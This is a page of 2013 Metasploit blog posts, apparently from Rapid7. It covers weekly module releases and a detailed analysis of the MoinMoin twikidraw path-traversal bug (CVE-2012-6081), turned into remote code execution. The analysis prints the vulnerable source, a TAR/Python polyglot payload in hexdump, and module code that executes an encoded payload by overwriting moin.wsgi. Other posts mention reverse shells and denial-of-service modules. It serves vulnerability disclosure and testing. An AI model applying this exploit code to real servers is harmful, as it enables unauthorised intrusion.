Skip navigation
All Places > Metasploit > Blog > 2013 > June
2013

Chaining Zpanel Exploits for Remote Root

 

ZPanel is a fun, open source web hosting control panel, written in code auditors' favorite language, PHP. For bonus points, ZPanel likes to do some things as root, so it installs a nifty little setuid binary called 'zsudo' that does pretty much what you might expect from a utility of that name -- without authentication. In the wake of some harsh words on reddit and elsewhere in regard to the character of ZPanel's development team, the project came to the attention of some exploit developers with predictable results; now for the low, low price of using two exploits (one to get shell, and one to abuse the zsudo silliness) you can get remote root from a low-priv ZPanel user account.

 

This update also includes an exploit for a vulnerability in MoinMoin, a wiki written in Python, which was used in the wild against wiki.python.org and wiki.debian.org not too long ago. Juan explained this bug in more detail earlier.  Interestingly, MoinMoin has support for FreeBSD, for which this update also includes a local privilege escalation module taking advantage of the fun new mmap vulnerability.

 

Moral of this story: if you're owned, assume you're completely owned. And if you're doing the owning, you get to do the root dance.

 

New Modules

Exploit modules

Auxiliary and post modules

 

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Recently we've added to Metasploit a module for CVE-2012-6081, an arbitrary file upload vulnerability affecting to the version 1.9.5 (patched!) of the MoinMoin Wiki software. In this blog entry we would like to share both the vulnerability details and how this one was converted in RCE (exploited in the wild!) because the exploitation is quite interesting, where several details must have into account to successful exploit it in a safe manner.

 

Interestingly this vulnerability was exploited on the wild on July 2012. Details about the "in the wild" exploit were disclosed at the end of 2012 / beginning of 2013 by sites such as wiki.python.org and wiki.debian.org.

 

pythonwiki.pngdebianwiki.png

 

The vulnerability was patched on 29 Dec 2012. The patch indeeds solves two exploit paths for the same vulnerability, which is a lack of sanitation on user supplied data before creating a "ContainerItem" (more about that later):

 

patch1.png

 

First of all we're going to review the vulnerable code for the twikidraw.py case, as exploited in the wild. Come on to start with the execution of a "twikidraw" action:

 

  • User supplied data is used to populate the target variable:

 

def execute(pagename, request):
    target = request.values.get('target')


















 

  • A TwikiDraw instance is created:

 

    twd = TwikiDraw(request, pagename, target)


















 

  • When "do" user supplied parameter is "save" the save() method from the instance is called:

 

    if do == 'save':
        msg = twd.save()


















 

  • Come on to see how TwikiDraw saves. First of all it checks which the request comes with a good ticket

 

    def save(self):
        request = self.request
        _ = request.getText


        if not wikiutil.checkTicket(request, request.args.get('ticket', '')):
            return _('Please use the interactive user interface to use action %(actionname)s!') % {'actionname': 'twikidraw.save' }


















 

  • Check which the user has write permissions on the page and the target is indeed not empty:

 

        pagename = self.pagename
        target = self.target
        if not request.user.may.write(pagename):
            return _('You are not allowed to save a drawing on this page.')
        if not target:
            return _("Empty target name given.")


















 

It is an interesting detail because in order to exploit access with write permissions to a WikiPage is needed. By default the Metasploit module will use the WikiSandBox page, writable without authentication on the default install. But both the WikiPage and credentials can be configured through module parameters.

 

  • Populate file_upload and filename variables from user supplied data:

 

        file_upload = request.files.get('filepath')
        print '[*] file_upload: %s' % file_upload
            # This might happen when trying to upload file names
            # with non-ascii characters on Safari.
            return _("No file content. Delete non ASCII characters from the file name and try again.")


        filename = request.form['filename']


















 

  • Some variables are populated from the filename value, the most interesting interesting one is "ext" because will be used later on exploitation (tries to be the extension of the filename):

 

        basepath, basename = os.path.split(filename)
        basename, ext = os.path.splitext(basename)


















 

  • An "AttachFile.ContainerItem" instance is created from the "target" value (user supplied value and not sanitized!).

 

ci = AttachFile.ContainerItem(request, pagename, target)


















 

  • Finally user supplied data is put into the ContainerItem. User controlled data ("ext" which comes from "filename" and "file_upload" which comes from "file_path") can be used to influence all the parameters of the "ci.put()" call:

 

        filecontent = file_upload.stream
        content_length = None
        if ext == '.draw': # TWikiDraw POSTs this first
            // Out of scope

        elif ext == '.map':
            // Out of scope
        else:
            #content_length = file_upload.content_length
            # XXX gives -1 for wsgiref  If this is fixed, we could use the file obj,
            # without reading it into memory completely:
            filecontent = filecontent.read()

        ci.put('drawing' + ext, filecontent, content_length)


















 

  • Now time to look into the "AttachFile.ContainerItem" class. From the documentation can be spotted which a ContainerItem is, indeed, a TAR file:

 

class ContainerItem:
    """ A storage container (multiple objects in 1 tarfile) """


















 

  • When an instance is created (remember which the "containername" parameter is full controlled by the user, since comes from the "target" request parameter):

 

    def __init__(self, request, pagename, containername):
        self.request = request
        self.pagename = pagename
        self.containername = containername
        self.container_filename = getFilename(request, pagename, containername)


















 

  • on "getFilename()" is where the traversal directory abuse can occurs at the moment of calling os.path.join() since the filename value is user controlled and traversal sequences are not sanitized (it is what the patch tries to solve):

 

def getFilename(request, pagename, filename):
    """ make complete pathfilename of file "name" attached to some page "pagename"
        @param request: request object
        @param pagename: name of page where the file is attached to (unicode)
        @param filename: filename of attached file (unicode)
        @rtype: string (in config.charset encoding)
        @return: complete path/filename of attached file
    """
    if isinstance(filename, unicode):
        filename = filename.encode(config.charset)
    return os.path.join(getAttachDir(request, pagename, create=1), filename)


















 

  • Later when twikidraw put() contents on the container, the user can manipule the specified "target" file such as a tar. And control a new entry to wrote into it, having control of the member (name of the entry) and the content, with the "filename" and the "filepath" values from the HTTP request respectively:

 

    def put(self, member, content, content_length=None):
        """ save data into a container's member """
        tf = tarfile.TarFile(self.container_filename, mode='a')
        if isinstance(member, unicode):
            member = member.encode('utf-8')
        ti = tarfile.TarInfo(member)
        if isinstance(content, str):
            if content_length is None:
                content_length = len(content)
            content = StringIO(content) # we need a file obj
        elif not hasattr(content, 'read'):
            logging.error("unsupported content object: %r" % content)
            raise
        assert content_length >= 0  # we don't want -1 interpreted as 4G-1
        ti.size = content_length
        tf.addfile(ti, content)
        tf.close()


















 

So, this vulnerability gives to the user the power to write an arbitrary TAR file on the filesystem, and partially control the file content (the entry name and its contents), always with the privileges of the web (app) server running the MoinMoin app. The question which remains is how to convert a remote arbitrary TAR file creation into a remote code execution. And the answer is on the exploit, which was finally disclosed on May 2013:

 

original_exploit.png

 

What MoinMelt authors noticed is which a TAR file is just a container (and files are not compressed neither encrypted, etc. by default). Come on to see an example. There is a very simple python file:

 

$ cat MySpecialHelloWorldForTest.py

print 'Hello Contents'

 

If we tar it, the result is something like that:

 

$ tar cf Hello.tar MySpecialHelloWorldForTest.py

$ hexdump -C Hello.tar

00000000  4d 79 53 70 65 63 69 61  6c 48 65 6c 6c 6f 57 6f  |MySpecialHelloWo|

00000010  72 6c 64 46 6f 72 54 65  73 74 2e 70 79 00 00 00  |rldForTest.py...|

00000020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

*

00000060  00 00 00 00 30 30 30 36  34 34 20 00 30 30 30 37  |....000644 .0007|

00000070  36 35 20 00 30 30 30 30  32 34 20 00 30 30 30 30  |65 .000024 .0000|

00000080  30 30 30 30 30 32 37 20  31 32 31 36 30 31 30 37  |0000027 12160107|

00000090  33 34 33 20 30 31 36 37  31 35 00 20 30 00 00 00  |343 016715. 0...|

000000a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

*

00000100  00 75 73 74 61 72 00 30  30 6a 75 61 6e 00 00 00  |.ustar.00juan...|

00000110  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

00000120  00 00 00 00 00 00 00 00  00 73 74 61 66 66 00 00  |.........staff..|

00000130  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

00000140  00 00 00 00 00 00 00 00  00 30 30 30 30 30 30 20  |.........000000 |

00000150  00 30 30 30 30 30 30 20  00 00 00 00 00 00 00 00  |.000000 ........|

00000160  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

*

00000200  70 72 69 6e 74 20 27 48  65 6c 6c 6f 20 43 6f 6e  |print 'Hello Con|

00000210  74 65 6e 74 73 27 0a 00  00 00 00 00 00 00 00 00  |tents'..........|

00000220  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

*

00000800

 

Interestingly the original file name is included at offset 0 and original contents are available at offset 0x200. As the reader can imagine this tar wouldn't be interpret as python:


Traceback (most recent call last):

  File "Hello.tar", line 1, in <module>

    MySpecialHelloWorldForTest.py

NameError: name 'MySpecialHelloWorldForTest' is not defined

 

But we should remember which the vulnerability allows us to control also the entry name, so if we modify the resulting tar to look like this one:

 

$ hexdump -C Hello3.tar

00000000  70 72 69 6e 74 20 27 69  74 73 20 66 6f 72 20 74  |print 'its for t|

00000010  65 73 74 20 70 75 72 70  6f 73 65 73 27 00 00 00  |est purposes'...|

00000020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

*

00000060  00 00 00 00 30 30 30 36  34 34 20 00 30 30 30 37  |....000644 .0007|

00000070  36 35 20 00 30 30 30 30  32 34 20 00 30 30 30 30  |65 .000024 .0000|

00000080  30 30 30 30 30 32 37 20  31 32 31 36 30 31 30 37  |0000027 12160107|

00000090  33 34 33 20 30 31 36 37  31 35 00 20 30 00 00 00  |343 016715. 0...|

000000a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

*

00000100  00 75 73 74 61 72 00 30  30 6a 75 61 6e 00 00 00  |.ustar.00juan...|

00000110  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

00000120  00 00 00 00 00 00 00 00  00 73 74 61 66 66 00 00  |.........staff..|

00000130  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

00000140  00 00 00 00 00 00 00 00  00 30 30 30 30 30 30 20  |.........000000 |

00000150  00 30 30 30 30 30 30 20  00 00 00 00 00 00 00 00  |.000000 ........|

00000160  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

*

00000200  70 72 69 6e 74 20 27 48  65 6c 6c 6f 20 43 6f 6e  |print 'Hello Con|

00000210  74 65 6e 74 73 27 0a 00  00 00 00 00 00 00 00 00  |tents'..........|

00000220  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

*

00000800

 

And try to execute it as python, the magic occurs:

 

$ python Hello3.tar

its for test purposes

 

So with the proposed primitives python remote code execution is indeed possible! Looking at the resulting TAR created by the original MoinMelt two pieces of python can be spotted:

 

00000000  64 72 61 77 69 6e 67 2e  72 20 69 66 28 29 65 6c  |drawing.r if()el|

00000010  73 65 5b 5d 0a 65 78 65  63 20 65 76 61 6c 28 22  |se[].exec eval("|

00000020  6f 70 65 6e 28 5f 5f 66  69 6c 65 5f 5f 29 5c 35  |open(__file__)\5|

00000030  36 72 65 61 64 28 29 5c  35 36 73 70 6c 69 74 28  |6read()\56split(|

00000040  27 5b 4d 41 52 4b 5d 27  29 5b 2d 32 5d 5c 35 36  |'[MARK]')[-2]\56|

00000050  73 74 72 69 70 28 27 5c  5c 30 27 29 22 29 00 00  |strip('\\0')")..|

00000060  00 00 00 00 30 30 30 30  36 36 36 00 30 30 30 30  |....0000666.0000|

00000070  30 30 30 00 30 30 30 30  30 30 30 00 30 30 30 30  |000.0000000.0000|

00000080  30 30 30 33 34 32 35 00  30 30 30 30 30 30 30 30  |0003425.00000000|

00000090  30 30 30 00 30 33 30 32  32 33 00 20 30 00 00 00  |000.030223. 0...|

000000a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

*

00000100  00 75 73 74 61 72 00 30  30 75 73 65 72 00 00 00  |.ustar.00user...|

00000110  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

00000120  00 00 00 00 00 00 00 00  00 67 72 6f 75 70 00 00  |.........group..|

00000130  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

00000140  00 00 00 00 00 00 00 00  00 30 30 30 30 30 30 30  |.........0000000|

00000150  00 30 30 30 30 30 30 30  00 00 00 00 00 00 00 00  |.0000000........|

00000160  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

*

00000200  5b 4d 41 52 4b 5d 65 78  65 63 20 22 49 79 41 74  |[MARK]exec "IyAt|

00000210  4b 69 30 67 59 32 39 6b  61 57 35 6e 4f 69 42 70  |Ki0gY29kaW5nOiBp|

00000220  63 32 38 74 4f 44 67 31  4f 53 30 78 49 43 30 71  |c28tODg1OS0xIC0q|

00000230  4c 51 6f 4b 61 57 31 77  62 33 4a 30 49 48 4e 35  |LQoKaW1wb3J0IHN5|

// Cut to improve blog readability

 

The first piece of python, at the offset 0, will read the current file, search the [MARK] marks, and finally exec() the content. This piece of python comes from the "filename" extension and can't include "." chars. Because of these limitations it's just an stub. The contents of the [MARK] is indeed the final python payload and comes from the full controlled, unrestricted "filepath" request parameter.


So far so good, the only question which remains is where to write, in the MoinMoin context, to get remote code execution. The MoinMelt exploit uses two approaches. And these two methods are evaluated having into account the recommended deployment method by MoinMoin, which is to use Apache with mod_wsgi:

 

  1. Create a new MoinMoin action: There are some drawbacks with this method. The first one is which, when doing a system-wide installation, the MoinMoin code is installed in the python LIB path by default, which could be not easily reachable from the wiki instance directory, where the attachment containers are created by default. Also the web server user could not have permissions to write on the file dir after the a default system-wide installation. Plus Apache restar could be required.
  2. Overwrite the moin.wsgi file. Or what is the same, overwrite the configured WSGIScriptAlias, by default named moin.wsgi and installed on the root of the wiki instance directory. The advantages of this method are:
    • By default is installed on the wiki instance directory, so easily reachable from the attachment containers default directory.
    • Apache restart isn't required, when there is a new request to process, a new thread (and worker) will be spawn which will start the python execution on the moin.wsgi file. So immediate execution of the uploaded payload can be achieved.


The second method is the used on the Metasploit module developed to test and exploit this vulnerability. Unfortunately, as the reader maybe is guessing, there is a big drawback with this method. After exploitation, requests processed by mod_wsgi will use the corrupted mod.wsgi file which will result on a denial of service of the MoinMoin wiki. In order to mitigate it two safeguards have been applied:


  • At exploitation time, the moin.wsgi file is overwritten with python code which, after payload execution, tries to launch the MoinMoin application using the default installation path "/usr/local/share/moin" for the MoinMoin instance (thanks egypt for the idea!):


# Upload payload
print_status("Trying to upload payload...")
python_cmd = "import sys, os\n"
python_cmd << "os.system(\"#{Rex::Text.encode_base64(payload.encoded)}\".decode(\"base64\"))\n"
python_cmd << "sys.path.insert(0, '/usr/local/share/moin')\n"
python_cmd << "from MoinMoin.web.serving import make_application\n"
python_cmd << "application = make_application(shared=True)"
res = upload_code(session, "exec('#{Rex::Text.encode_base64(python_cmd)}'.decode('base64'))")
if not res
  fail_with(Exploit::Failure::Unknown, "Error uploading the payload")
end



  • A post exploitation task has been added, where the module will try to find the moin.wsgi on the default installation path, and restore it with a basic one (start to read on the on_new_session() callback):

 

def moinmoin_template(path)
  template =[]
  template << "# -*- coding: iso-8859-1 -*-"
  template << "import sys, os"
  template << "sys.path.insert(0, 'PATH')".gsub(/PATH/, File.dirname(path))
  template << "from MoinMoin.web.serving import make_application"
  template << "application = make_application(shared=True)"
  return template
end


def restore_file(session, file, contents)
  first = true
  contents.each {|line|
  if first
  session.shell_command_token("echo \"#{line}\" > #{file}")
  first = false
  else
  session.shell_command_token("echo \"#{line}\" >> #{file}")
  end
  }
end


# Try to restore a basic moin.wsgi file with the hope of making the
# application usable again.
# Try to search on /usr/local/share/moin (default search path) and the
# current path (apache user home). Avoiding to search on "/" because it
# could took long time to finish.
def on_new_session(session)
  print_status("Trying to restore moin.wsgi...")
  begin
  files = session.shell_command_token("find `pwd` -name moin.wsgi 2> /dev/null")
  files.split.each { |file|
  print_status("#{file} found! Trying to restore...")
  restore_file(session, file, moinmoin_template(file))
  }


  files = session.shell_command_token("find /usr/local/share/moin -name moin.wsgi 2> /dev/null")
  files.split.each { |file|
  print_status("#{file} found! Trying to restore...")
  restore_file(session, file, moinmoin_template(file))
  }
  print_warning("Finished. If application isn't usable, manual restore of the moin.wsgi file would be required.")
  rescue
  print_warning("Error while restring moin.wsgi, manual restoring would be required.")
  end
end















 

As documented in the code, it doesn't try to search the full filesystem because it could take a long time on real deployments where big disks could be used.  On the other hand, after exploitation, the user still could manually try to restore the moin.wsgi by locating the Apache configuration and searching the WSGIScriptAlias directive. Its value should point to the location of the moin.wsgi file.

 

So far so good, once the details, pros and contras have been explained, time to enjoy the Metasploit module:

 

exploit.png

 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.

egypt

Weekly Update: Smaller is Better

Posted by egypt Employee Jun 20, 2013

In this week's episode, the role of Tod Beardsley will be played by egypt.

 

Smaller is better

Perhaps the most prominent addition to the framework this week is not an addition at all, but rather a deletion. We've been working toward a slimmer, more manageable source tree for a while now, and as part of that effort, we recently removed a pile of old-and-busted unit tests. This update goes a bit further, moving source code for some compiled payloads into seperate repositories. Metasploit's version of Javapayload (which includes Java and Android Meterpreter) can now be found at rapid7/metasploit-javapayload, the native C meterpreter lives in rapid7/meterpreter, and the excellent packet manipulation library, PacketFu, has been pulled out of the tree in favor of the standalone gem. As so often is the case when anything involving Java arises, thanks again go to mihi for his help with a consolidated java build environment. By my calculations, the framework repository is now somewhere in the neighborhood of 45MB lighter.

 

Less is more

Another thing that has gotten much smaller is our pull queue, thanks to the tireless efforts of the lovely wvu. Having someone working full-time on ticket husbandry has made many things go more smoothly, and as a result the number of pull requests and unresolved issues has been steadily falling.  Which, of course, means that now is a great time to submit that patch you've been meaning to write!

 

New Modules

This week brings 6 new modules:

 

 

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Stable is for Suckers!

Today on the Freenode IRC channel #metasploit, a user was asking about our old SVN repository for "unstable" Metasploit modules. He was lamenting its loss, since we recently shut down our SVN services (described in this blog post on May 22, 2013).

 

Fear not, danger-seekers! "Unstable" does live on in the form of a GitHub branch. You can check it out at https://github.com/rapid7/metasploit-framework/tree/unstable, and take a look at the unstable-modules directory. Most of the modules in there ran into some kind of trouble in testing or are too unreliable to package up and ship in Metasploit proper. But who knows? Opening up the unstable-modules directory is like buying a mystery box at auction, so you might find a lost treasure, or a mass of half-rotten comicbooks. If you're interested in that sort of thing, just be sure to check the history of the module in question to understand what all happened with it. This is usually pretty easy by reading the commit history and contacting the original author.

 

Another source for interesting-but-unshipped modules is Rob @mubix Fuller's Q Repository. Oftentimes, things that don't quite fit with the Metasploit main distro will end up here. I am totally on board with someone other than Rapid7 maintaining alternate streams of free, open source, unencumbered Metasploit modules. After all, why should we have all the fun spreading open source cheer around the Internet?

 

If you're after these modules for reasons beyond mere intellectual curiosity -- like, you actually want to use them -- all you need to do is create a directory structure like $HOME/.msf4/modules/auxiliary/test (or exploits/test, post/test, etc), and drop them in. You can change the name "test" to whatever you like, but you must declare what sort of module it is in the path. When you run msfconsole, those modules will be scooped up, and ready to use. Naturally, your mileage may vary, and there is certainly no guarantee that these modules are safe and appropriate for your network, but hey, stable is for suckers!

 

Heavy-handed UPnP Mitigation

Hey, remember that time HD Moore talked about all the zillions of UPnP devices that have broken implementations and vulnerable to remote exploitation? Yeah, that was pretty fun. Of course, it's less funny if you are responsible for some of these devices in your network. Is the ownership of these devices in your network unclear? Are they business critical, or not? Sometimes, it's hard to tell.

 

In my more Lawful Evil moments, it occurs to me that pretty much the fastest way to ferret out ownership of a device is to kick it offline and then find out who squawks. To that end, we have a Denial of Service module that kicks MiniUPnP 1.0 devices offline by exercising CVE-2013-0229, thanks to community contributor Dejan Lukan's implementation of HD's vulnerability discovery.

 

DoSes certainly can attract attention to a problem implementation. If the device is important enough to keep online, it's probably important enough to protect through some mind of mitigating strategy. Should you really DoS critical industrial control equipment that happens to have a single-packet kill vulnerability? Maybe the better question to ask is, "Is it better to wait for a bad guy to knock this industrial control gear offline on his schedule, or should I do it on my schedule?" Something to think about, anyway.

 

GNU AWK Bind and Reverse Shells

Once upon a time, the advice to system administrators hardening DMZ-based servers was to yank useful developer tools from those machines, since post-compromise, an attacker could use them to extend control. What this meant, at the time, was that you wouldn't want to have gcc or some other compiler installed on your web server, because you don't want to allow attackers to compile shells and backdoors and stuff like that locally. You'd also want to remove (or at least limit) interpreters like Perl or Python, for largely the same reasons.


I'm not entirely convinced that this is realistic advice; it would be difficult for a system administrator to perform job functions without some kind of programming help. And in this day and age of DevOps, where configuration management is increasingly the job of interpreted languages, the benefits of stripping system tools off a server may just not stack up to the cost of not having them there when you need them legitimately.

 

That all said, if you happen to run into a CentOS / RedHat based system that is configured by a paranoid, you might want to check if GNU awk is installed (as it is by default). If so, you could leverage this particular flavor of awk and use its built-in socket capabilities to open either a bind shell or reverse shell, thanks to the two new payloads provided by community contributors Roberto Soares and Ulisses Castro. It's at the very least novel, and may avoid IPS/IDS string checkers that are looking for the more traditional Perl and bash-based sockets. And hey, is there really a good reason why I need to be able to bind to a socket with just awk?

 

New Modules

We've got seven new Metasploit modules this week, not counting the aforementioned AWK payloads. Enjoy!

 

 

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Screen Shot 2013-06-05 at 3.26.46 PM.pngEveryone loves a good cyber-espionage story, and we love to put China under the spotlight.  Why? Because their methods work.  China has some well known hacking groups that have conducted cyber-espionage-oriented attacks, such as the Elderwood Group, Unit 61398, the Nitro gang, etc.  As far as we know, most of these groups tend to use some kind of 0day exploit to gain acces of the targeted organization, and then steal terabytes of data for years.  However, by studying these hacking groups, we also learned that a successful APT doesn't always require an 0day, whatever gets the job done is more than enough, and NetTravler demonstrates just that.

 

According to a recent research paper by Kaspersky, the Chinese-based hacking group NetTraveler tends to get their victims infected through spear-fishing attacks using exploits that are already publicly known, specifically CVE-2010-3333 and CVE-2012-0158.  Although already patched, these vulnerabilities still remain effective, and are among the most exploited in recent attacks, for example:  Tibetan/Uyghur activists, oil industry companies, scientific research centers, universities, private companies, governments and military contractors, etc.  And of course, they've stolen more than 22+ gigabytes of data because they 1337.

 

This is all kind of depressing (or amusing?) to hear especially when our memory is still fresh about HD Moore's talk about how many percent of the Internet still remain insecure, and NetTraveler kind of verifies that claim by shoving old exploits in the US government's faces.  Hey guess what?  As a high profile target, you can prevent that.  If you run a system update, your vulnerable software will tell you your stuff is outdated.  If you run a vulnerability scanner, the scanner will tell you you're waiting to be exploited.  If you run a penetration testing framework like Metasploit, shells will be popped, and that should be a red flag for you.

 

CVE-2012-0158 is a vulnerability in Microsoft Office.  There is a Metasploit module (ms12_027_mscomctl_bof.rb) that specifically targets Office 2007 and Office 2010, written by Wei Chen and Juan Vazquez.  Demo (note: target specific):

 

Screen Shot 2013-06-05 at 5.43.51 PM.png

 

CVE-2010-3333 is a vulnerability in Microsoft Word. There is also a Metasploit module (ms10_087_rtf_pfragments_bof.rb) for it targeting Office 2003, 2010, and 2010.  Written by ex-Metasploit Exploit Developer Joshua J. Drake.  Demo:

 

Screen Shot 2013-06-05 at 5.41.58 PM.png

 

If you're new to Metasploit and you'd like to try it out, you can download Metasploit for Linux or Windows for free.

Apache Struts Exploit

This week's update includes an exploit for a pretty recent vulnerability in Apache Struts, thanks to community contributor Richard @Console Hicks. The struts_include_param module exercises the vulnerability described at OSVDB 93645, disclosed on May 23, 2013, a bare two weeks ago, and originally discovered by Eric Kobrin and Douglad Rodrigues.

 

The reason why I bring this up is not just because it's a solid exploit for a recent vulnerability (it is), but also because it illustrates, to a small extent, the Metasploit philosophy of disclosing working, tested exploits pretty much as soon as vulnerabilities are made public.

 

If you are bothered by this stance, then maybe it's time to drag out a dusty old security meme: Defense in Depth. I know for sure there are IT operations folks out there who believe that there is absolutely nothing they can do in the face of zero-day vulnerabilities. This is a horrible, horrible place to be. The fact is, there are volumes and volumes written on defense in depth: you can segment your network, instrument your servers, keep an eye on egress rules, and generally make life a huge hassle for would-be attackers armed with zero (or 14, or 30) day vulnerabilities that you haven't patched against yet.

 

I'm heartened that Google appears to have taken a similiar stance on this, with their announced policy of disclosing active, in-the-wild exploits in the interest of public safety. An Internet giant like Google taking an anti-secrecy stance like this is pretty powerful, and I'm looking forward to the next few weeks of vulnerability disclosures from them.

 

Android Meterpreter

Once, a few weeks back, a fellow named timwr popped into the Metasploit IRC channel on Freenode and complained, rather rudely I might add, "How come there's no Android Meterpreter?" Egypt immediately responded with something along the lines of, "because you haven't written it yet." That, my friends, is how new ports of Meterpreter are made.

 

Timwr, mihi, and Egypt got together over the next several weeks, and as of May 28 or so, we now have a pretty decent Meterpreter app for Android. Expect a much more whiz-bang blog post on this soon, but in the meantime, it's pretty fun to mess around with it now. We don't have mcuh in the way of Android exploits right now, of course, but that brings me to another topic.

 

New Payloads

This week's update also includes new payloads for ARM and 64-bit Windows. We've three new payloads, all from community contributor @dcbz32, to create reverse TCP and reverse HTTPS connections, as well as a simple shell payload. Hooray, our ARM support is getting more robust all the time; now if only we could convince people to start writing up decent Android and embedded system exploits...

 

In addition, we also have a 64-bit Windows payload for reverse HTTPS, from community contributor agix. This has been a long standing feature request, because while in most cases, 32-bit payloads work just fine on 64-bit platforms, this isn't the case 100% of the time. While this payload works like a champ on Windows 7 and related platforms, it most notably is not supported for Windows 8 targets. Something funny is going on in Win8-land specifically, and it's proving squirrelly to nail down. So, good job to Microsoft for making post-exploit development a little bit harder on their latest platform (: . If you happen to have expertise in this area, we'd love to get your input on putting something solid together for Win8 reverse HTTPS connections as shellcode; ideally, we can end up with one payload for both 64-bit platforms.

 

New Modules

We've five new modules this week, including the Apache Struts exploit. Check 'em below.

 

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Filter Blog

By date: By tag: